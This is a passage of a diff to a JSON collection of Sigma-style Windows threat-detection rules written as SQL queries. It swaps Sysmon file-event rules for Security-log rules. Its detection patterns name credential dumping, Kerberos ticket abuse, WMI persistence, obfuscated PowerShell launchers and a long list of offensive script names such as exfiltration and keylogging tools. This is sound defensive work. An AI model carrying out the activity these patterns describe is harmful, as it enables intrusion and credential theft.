ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' 
ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" - ], - "filename": "file_event_win_crackmapexec_patterns.yml" - }, - { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", - "tags": [ - "attack.t1036.005", - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + 
"attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT 
* FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the 
creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. 
Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + 
"attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE 
'\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + }, + { + "title": "ISO Image Mount", + "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "status": "experimental", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. 
This folder should always be inspected to make sure that all the files in there are legitimate" + "Software installation ISO files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.009" + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": 
"win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - 
"title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Initial installation of a domain controller" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' 